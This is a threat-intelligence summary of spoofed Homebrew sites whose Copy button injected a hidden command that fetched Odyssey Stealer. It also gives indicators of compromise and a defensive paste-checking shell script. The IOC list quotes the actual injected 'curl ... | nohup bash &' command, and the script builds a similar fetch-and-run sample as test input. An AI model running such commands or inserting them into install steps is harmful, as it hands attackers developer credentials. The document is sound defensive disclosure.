Attackers stood up multiple spoofed Homebrew installer sites that cloned brew.sh but blocked text selection, forcing visitors to use a page-provided Copy button that silently appended a hidden malicious shell command to the clipboard. Pasting the "installer" into a terminal then ran the attacker's command in the background alongside the genuine one, fetching payloads such as Odyssey Stealer. Kandji documented the shared hosting infrastructure, Russian-language code comments that point to a payload-as-a-service model and Telegram exfiltration, and published the domains and a malicious curl command used in the campaign. #OdysseyStealer #HomebrewOnline
Keypoints
- Kandji researchers found multiple spoofed Homebrew domains (e.g., homebrewonline[.]org) resolving to the same hosting IP, 38[.]146[.]27[.]144, which served carbon-copy Homebrew pages.
- The fake pages prevented text selection and forced use of a Copy button that wrote an attacker-controlled command to the clipboard, so a hidden command was injected without the victim seeing it when they pasted the "installer" into a terminal.
- Embedded JavaScript logged each click by POSTing to notify.php and carried Russian-language comments marking where to insert malicious commands and suggesting exfiltration endpoints such as Telegram, which points to a kit sold as commodity "malware-as-a-service".
- In at least one observed instance the injected command downloaded Odyssey Stealer, showing the campaign delivered a real credential-stealing payload rather than being a one-off scam.
- Campaign artifacts, including a published malicious command built around a base64-encoded curl payload, show the kit was actively weaponized and its payload swapped quickly to keep a working command in place before takedown.
- Homebrew and other package managers are high-value targets because developer machines concentrate credentials, tokens and build artifacts; a compromised installer can give broad access inside an organization.
- Kandji published example IOCs, pointed to a community-maintained domain list for detection and blocking, and recommends verifying the install source and reading the command before running any one-liner.
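The last two points above (read the command before running it, and a hidden second command riding along in the clipboard) can be turned into a mechanical check. The following paste guard is an added example, not code from Kandji's write-up or from the Homebrew project: it inspects a copied one-liner for the traits the campaign relied on (extra lines, chaining or backgrounding, inline base64 decoding, plain-http URLs, raw IP hosts, hosts other than the ones the genuine brew.sh installer contacts) and refuses anything that does not look like the single genuine install command. The allow-listed host names, the `pbpaste` wrapper and the 203.0.113.10 placeholder address in the constructed malicious sample are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the Kandji write-up or from Homebrew): a paste guard
# that inspects a copied install one-liner before anyone runs it.  The genuine
# installer shown on https://brew.sh is a single command that fetches
# install.sh from raw.githubusercontent.com; anything else is refused.

# Hosts the genuine Homebrew installer is allowed to contact (assumption).
ALLOWED_HOSTS="raw.githubusercontent.com github.com brew.sh"

# inspect_install_command TEXT
#   Prints one "suspicious: ..." line per finding.  Returns 0 when TEXT looks
#   like the genuine single-command installer, 1 when anything was flagged.
inspect_install_command() (
    cmd=$1
    bad=0
    note() { printf 'suspicious: %s\n' "$1"; bad=1; }

    # A clipboard holding more than one line pastes as several commands; the
    # hidden second line runs as soon as the terminal sees its newline.
    lines=$(printf '%s\n' "$cmd" | grep -c '')
    [ "$lines" -gt 1 ] && note "$lines lines pasted, expected 1"

    # Chaining (; &&) or backgrounding (nohup, trailing &) is how an injected
    # "curl ... | nohup bash &" rides along with the visible installer.
    printf '%s' "$cmd" | grep -Eq ';|&&|(^|[[:space:]])nohup[[:space:]]|&[[:space:]]*$' \
        && note "command chaining or backgrounding"

    # Decoding base64 inline hides the real URL from the reader.
    printf '%s' "$cmd" | grep -Eq 'base64[[:space:]]+(-d|-D|--decode)' \
        && note "inline base64 decoding"

    # Every URL must use https and point at an allow-listed host; plain http
    # and raw IP addresses are refused outright.
    for url in $(printf '%s' "$cmd" | grep -oE 'https?://[^/"'"'"'[:space:]]+'); do
        host=${url#*://}
        case "$url" in http://*) note "plain http URL $url";; esac
        printf '%s' "$host" | grep -Eq '^[0-9]+(\.[0-9]+){3}(:[0-9]+)?$' \
            && note "raw IP address as host: $host"
        ok=0
        for h in $ALLOWED_HOSTS; do [ "$host" = "$h" ] && ok=1; done
        [ "$ok" -eq 1 ] || note "host $host is not an allow-listed Homebrew host"
    done

    return "$bad"
)

# macOS helper (assumes pbpaste): show the clipboard and run the check on it.
guarded_paste() {
    cmd=$(pbpaste)
    printf 'clipboard contents:\n%s\n' "$cmd"
    inspect_install_command "$cmd"
}

# The genuine installer as published on brew.sh.
GENUINE_INSTALL='/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

# Constructed sample of what a spoofed Copy button could place on the
# clipboard: the visible installer plus a hidden second line shaped like the
# injected "curl ... | nohup bash &" the write-up describes (placeholder IP).
INJECTED_INSTALL="$GENUINE_INSTALL
curl -s http://203.0.113.10/d/payload | nohup bash &"

if inspect_install_command "$GENUINE_INSTALL"; then
    echo "genuine installer: OK"
fi
inspect_install_command "$INJECTED_INSTALL" || echo "injected installer: REFUSED"
```

On the injected sample the checker reports five findings (two lines pasted, backgrounding, plain http, raw IP host, host not allow-listed) and exits non-zero, while the genuine command passes cleanly. The check is deliberately strict about hosts: an allow-list of the few domains the real installer contacts is easier to maintain than a block-list of spoofed ones that changes daily.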
MITRE Techniques
- [T1204] User Execution – The spoofed pages coerced users into copying and executing a hidden install command via a Copy button, described as “the page forces them to use a single Copy button…inject an extra hidden command into the clipboard.”
- [T1059] Command and Scripting Interpreter – Attackers injected shell commands (curl | bash style) into the clipboard so the victim's own shell downloaded and ran the payload: “the malicious, base64-encoded cURL payload.”
- [T1071] Application Layer Protocol – The page used HTTP(S) to fetch payloads and to POST click metadata to notify.php, quoted as “the script issues a POST request…sending a JSON payload to notify.php that logs the click time and other metadata back to the server.”
- [T1566] Phishing – The social-engineering lure mirrors “ClickFix” campaigns that trick victims into pasting attacker-supplied shell commands under a benign pretext: “This technique closely mirrors recent ‘ClickFix’ social-engineering campaigns…victims are coerced into pasting attacker-supplied shell commands.”
- [T1608] Stage Capabilities – The attackers staged carbon-copy Homebrew pages on their own infrastructure to serve the injected command; the kit's Russian-language comments also suggest where stolen data should go, “even suggest exfiltration destinations (for example, Telegram),” which corresponds to T1567, Exfiltration Over Web Service.
Indicators of Compromise
- [Domain] spoofed Homebrew sites used to serve malicious installer pages – homebrewfaq[.]org (active), homebrewonline[.]org, and others (see the domain repo below for more).
- [IP Address] common hosting/resolution for the spoofed domains – 38[.]146[.]27[.]144.
- [Command] injected installer command used to download and execute payloads – “curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &” (one example; the campaign also used base64-encoded cURL payloads).
- [Domain Repo] community-maintained list of related domains – https://github.com/stamparm/maltrail/blob/master/trails/static/malware/osx_atomic.txt.
Read more: https://the-sequence.com/brewing-trouble-homebrew-spoofed-sites-rise